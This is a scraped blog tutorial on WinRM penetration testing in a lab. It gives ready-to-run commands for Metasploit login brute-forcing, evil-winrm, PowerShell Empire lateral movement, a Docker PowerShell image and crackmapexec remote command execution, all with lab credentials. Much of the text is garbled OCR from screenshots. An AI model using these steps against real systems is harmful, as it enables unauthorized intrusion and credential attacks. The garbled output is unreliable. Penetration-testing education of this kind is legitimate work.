Hacking Articles Raj Chandel’s Blog Menu # Home » Red Teaming » WinRM Penetration Testing Red Teaming WinRM Penetration Testina June 12,2020 By Raj Chandel In this post, we will discuss alll possible methods and tools used for WinRM penetration testing. Let’s get deep into WinRM service and its security assessment and learn more. This attack can be performed locally (using windows client machine) and remotely (using Kali Linux) Lab Setup Windows Server 2016: 192.168.1.105 Windows 10 client: 192.168.106 Kali Linux: 192.168.1.112 Table of Content WinRM Service + History of WinRM + WinRM Configuration * Testing Connection Lateral Movement- Locally * Connecting Server shell using CMD * Connecting Server shell using PowerShell Lateral Movement- RemotelyScanning + Identify the WinRM Authentication Method + Winrm Login Brute Force * Connect to Remote Shell through Ruby script, + Connecting Remote Shell through Evil-WinRM * Connecting Remote Shell through PowerShell Empire * Connecting Remote Shell through Docker + Connecting Remote Shell through Crackmapexec WinRM Service WinRM is a command-line tool that enables administrators to remotely execute the CMD.exe commands using the WS-Management protocol. This specification describes a general SOAP-based protocol for managing systems such as PCs, servers, devices, Web services, other applications, and other manageable entities. It port 5985 for HTTP transport and 5986 for HTTPS Transport. On server and client versions of the Windows operating system, Enable-PSRemoting allows the administrator to access the remote shell using Powershell for private and domain networks through WinRM service. History of WinRM Versions 1.1 of Winrm have been found in Windows Vista and Windows Server 2008, Its versions 2.0 have been found in Windows 7 and Windows Server 2008 R2 and the latest version 3.0 is pre-installed in Windows 8 and Windows 2012 Server, but you need to enable it in Windows 10. WinRM Configration Configuring and installing WinRM is quite simple, but you only need to execute commands below that will enable WinRM on the server for trusted hosts. Here we have given the wildcard character (*) for all the machines on the network. This type of configuration cloud is a threat to the server because it allows any machine to connect to a server that knows the server's credential Enable-PSRemoting -force winrm quickconfig -transport:https Set-Item wsman:\localhost\client\trustedhosts * Restart-Service WinRM Note: WinrRM Service should be Enabled on both machine (Server and client)S sers\Administrator> Enable-PSRemot ing set rhosts 192.168.1.105 Scum aeTe sarc) TU eta mt Breese rte eae nC Se reese (eee) percep teeseenny( eer itsts yee ees ee Cette seacoast) 192.168.1.105:5985: Kerberos protocol supported Se eee eC Lac tas )) Pireaer meeescaneCume etee) msf5 auxiliary( don WinRM Login Brute Force ite to. a WinRM service. It currently works only if the This module attempts to authe remote end allows Negotiate (NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the ‘AllowUnencrypted’ winrm option must be set. Otherwise, adjust the port and set the SSL options in the module as appropriate. use auxiliary/scanner/winrm/winrm_login msf auxiliary(scanner/winrm/winrm_login) msf auxiliary(scanner/winrm/winrm_ login) msf auxiliary(scanner/winrm/winrm_login) ( ¢ set rhosts 192.168.1.105 set user_file /root/user.txt set pass_file /root/pass.txt set stop_on_success true exploit msf auxiliary(scanner/winrm/winrm_login) msf auxiliary(scanner/winrm/winrm_login) As a result, it will try a valid combination of username and password and dump the output accordingly.presets Raters st) Setecees pierre inocu yeaa 0)) eee rC eyes. Pere eriert (eet nem) rhosts 192.168.1.105 Pee eed Pear eee Cee heiee 1 amma riers as insf5 auxiliary( a Ree eet Re yeomseD eee 1 Poesy Cerca soe Rear etc] ccs cy oe ce ete 5985 ry Bry ees) oe esc) es) esa) esa) van xa avd vay via Poou cue recy WORKSTATION\yashika Pec eSintcy POUCA NESS WORKSTATION\yashika: eae ae Passworda (Incorrect: ) Passwordai23 (Incorrect: ) Bei bet. me Uae iae brie PEO lores ad ee ce ee coe cy oe Br Bry esa) esa) esa) esa) esc) eo) eo) esa) esa) esa) esa) esa) esc) es) esa) esa) vale vi va Eva xa avd vay avi vale vi va vas xa avd vay via Poor orem euteassts WORKSTATION\raj:Passworda1 (Incorrect: WORKSTATION\raj:: Passworda123_ (Incorre: WORKSTATION\raj:Tgnitea987 (Incorre: Porc Norrish ee m eure POUL Naat Leena WORKSTATION\geet : Password@1_ (Inco: WORKSTATION\geet : Passworda123 (Incorre WORKSTATION\ geet : Ignitea967 (Incorr: WORKSTATION geet : Igniteai23 (Incorr: oro case emeue sts) WORKSTATION\aarti: Passwordal (Incorrect Prearrcn castrate Rueda’ WORKSTATION\aarti: Tgniteass7 (Incorrect Poca Ncastprarece remeatars PICUcON Ts eserteiel teem eats raaae) PUAN Sat i Ereiteet epee Gt Sanaa rected 1 ft a A a a rt 1 Ft ft a cee ete a rt 1 Ft ft a A a q comp' Peete) Connect to Remote Shell through Ruby script You can download the ruby script from GitHub that allow the Linux system to connect with Windows Protocol WinRM and provide the access of the PowerShell of the target machine. You can download it from here and add Target IP, username as well as password inside the download script then install WinRM in your local machine and execute the script. gem install winrm ruby winrm-shell.rb Asa result, you will get PowerShell access to the target machine as shownEee reciente etl rey sie acts a rer s Done installing documentation for winrm after 0 seconds pare Unca nt) ~# cat winrm-shell.rb prec Ch Cormem Feces M16 endpoint: ‘http: //192.168.1.105:5985/wsman", Peer ures c iam password: ‘Ignitea9s7', D) oot Cee elo ee ia) isto ears tam) Sete ea oer Oi eee a TCR Sc amo] Suess as Be erase poss or er puts "Exiting with code #output.exitcode}* end Peer Cree \aee) PS > dir PSeser rates Cree Geet t sch) ea hese est eu as Ce ste tan) Ta st ae Star VES tS STS ae nna Le te Default Gateway... ... 2. . : 192.168.1.1 SOME Sesae Cre Cleese el yt) a ager SLL ye Media State... ....... . + Media disconnected Connection-specific DNS Suffix BUM coe eee ec a Cae Cec es eM eu) Connect ion-specific DNS Suffix ps> il Connecting Remote Shell through Evil-WinRM Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. In our previous article we have already discussed on Evil-Winrm and its usage, you can more about it fromevil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987" As a result, it will give access to victim shell by providing its PowerShell as given below. eee eee er ures coe mere Ta Pe EON ec oa Lemur CYA ceca ke CR eee NL les Trrre is ieoeueert cg meet og lea partcecsuriay PS C:\Users\Administrator\Documents> ipconfig Windows IP Configuration eee ase ass) Connection-specific DNS Suffix . : cae : 192.168.1.105 Ss aoe ooo oes rr ny eich hat aE CS Pe Pee ROAM Cine ate ee GCSE ess eee CEL LOT Cee (ere, CM Cac) astm seta eee’ Dirac oe eC Cee ees eee) Connection-specific DNS Suffix PS C:\Users\Administrator\Docunents> I] Connecting Remote Shell through PowerShell Empire Once you've compromised the host machine using the empire, as we've done here, Using Powershell Empire, you can perform post-exploitation to access the server shell via the client machine using the WinRM service.|(Empire: Listeners) > agents fomcrtrnr sy ce ee ed Corey COE) re ete eC mec et pear r etc} Peeeeand 6968 5/0.0 (Cue eat Empire: Sent) oie Py FI Pere) rears preceets ron peng rg earn Peony ers $ Par 5 prora A externat_ip er eRe) Pernt FCrerr ery Preece pera creer D cent i Eta Peery Perrone nya Preriesererrrert Perereraerterey perrerostg Pita ae Veere) parent ren esiean None peared rang profile /adnin/get.php,/news.php,/Login/process.php|Mozil1a/5.0 (Windows NT Cera is ay Aare at) en perm rrrtaities so esters None usemodule lateral_movement/invoke_psremoting set Listener http set ComputerName 192.168.1.105 set UserName administrator set Password Ignite@987 execute And finally! We got the shell of the server through client machine.ces Me Com es Ce sets (city Sarees) (ere eee ea uty ee ee (ree > Set UserName administrator (cree parecer (eres exerted (Cres [+] Initial agent XVEB7F6L from 192.168.1.105 now active (Slack) (Empire: eae Cre eC sce COM Ce Cd esac) Prey Pica eer et eee eget SCENE eens ea eee ees Oe oa AUC Sear iae ced eras (cots Set y2) Fa saa as pa cane 5 5 x) Fey PeCs SE ReC ctr IGNITE\Administrator i oceans cra rece) Crore renee mre y Ce gO ee ase Lea neta Coe re cL eerie pre a eevee Prt ee ecrerEe re rs rd rs aU oa Le MAC suet Esa ty eC era ies ue Perec eC eC eM ots) Connecting Remote Shell through Docker Docker image of PowerShell with NTLM support to allow for PS-Remoting from Linux to Windows, hence we can use this to access the shell of the server by executing following command Read more from here.docker run -it quickbreach/powershell-nt1m Once it will install the docker image, you will get the session for login credential as shown below in the image. As soon as you will enter the server login it will give a shell of the server. eer ce ete meee Cenc RC OREM rte re ismnat aera Canny [oenee tesa omar eee aera) Pree ame a PStrer rem near. tard Piericeri anemey itstd Peron tren gris 9b8c213e2ea6: Pull complete Erie eats’ Peter re nemry itary Pere starr ac or eet acon erer eae er Seer Poet raster eats neste y nr ceria era e ete nis ame eee erste cri saco Tics CiteSeer ee nee /e Ue aoe Leu cesiat rts een eer asc eete Enter your credentials. Mere rr Petr eae taet tres oreeecrercsy fea 192.168.1.105 Perret ts eC G ee OEE ren eNT Uesr tonne res [192.168-1.105]: PS C:\Users\adninistrator\Documents> oe eet Sc eae emacs PH sy eaneasdlandauibe art ee ane Pct tT) ira ts see nr ete t ary) POET Mott ee enanmnraE TS IeT SERe LOee etre cote oi eer eee SLT Pereira’ Perera) Coote Gta Cat! POEL ORCL asc Lr Cen Ree eat) Connection-: ars Petaset [292.168.1.105]: Caer conus | Connecting Remote Shell through Crackmapexec Now using Crackmapexec we try to execute arbitrary system command remotely by connecting through port 5985 open for winrm. In our previous article we have already discussed on Crackmapexec and its usage, you can more about it fromcrackmapexec winrm 192.168.1.105 ‘Administrator’ -p 'Ignite@987' -x ipcc As a result, it gives the output for request command as shown. a eT FRET aera TT TS Prey eC eC eRe gro 5986 | WIN-SOV7KMTVLOZ [+] IGNITE\Administrator:Ignitea967 (Pwnsd!) i ETE ly me eee erent Fomine etme mETCeS Tu Ttry Windows IP Configuration Coens Cate sta sed crt a cece ety El mE oe cee Est TC eT TM CeCe Mee ect err Cond Ce ae Perea) osercenereter ea eT te Se Comer ae ecco ee Pere ae) Cesta rt Gh Sere Reference: https://docs.microsoft.com/en-us/windows/win32/winrm/about-windows-remote- management Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here f FaceBook = W-—TWITTER «= @®_~—OPINTEREST =— im _—_LINKEDIN 4 PREVIOUS POST Next POST» HA: Natraj Vulnhub Walkthrough Credential Dumping: Domain Cache Credential Search SearchTweets ty @nackinarticies Hacking Articles @hackinarticles Pic of the Day#infosec #cybersecurity #oybersecuritytips #pentesting #oscp #redteam Hinformationsecurity #oissp #CyberSec Notifications mperature has longed Use at thi: [Je\ofe leis i eat Tele Cpe Lae MEGETae Sun 18h Hacking Articles @hackinarticles Pic of the Day#tinfosec #cyberseourity #oybersecuritytips #pentesting #oscp #redteam Hinformationsecurity #cissp #CyberSec Embed View on TwitterJoin Our Training Program Toa uu Ue PROGRAMS OAC Lg S Support Us esas Ic ARTICLES Categories Cryptography & Stegnography CTF Challenges Cyber ForensicsDatabase Hacking Footprinting Hacking Tools Kali Linux Nmap Others Password Cracking Penetration Testing Pentest Lab Setup Privilege Escalation Red Teaming Social Engineering Toolkit Uncategorized Website Hacking Window Password Hacking Wireless Hacking Wireless Penetration Testing Archives Select Month You may like MimiKatz for Pentester: Kerberos July 11, 2022 Caldera: Red Team Emulation (Part 1) June 16, 2022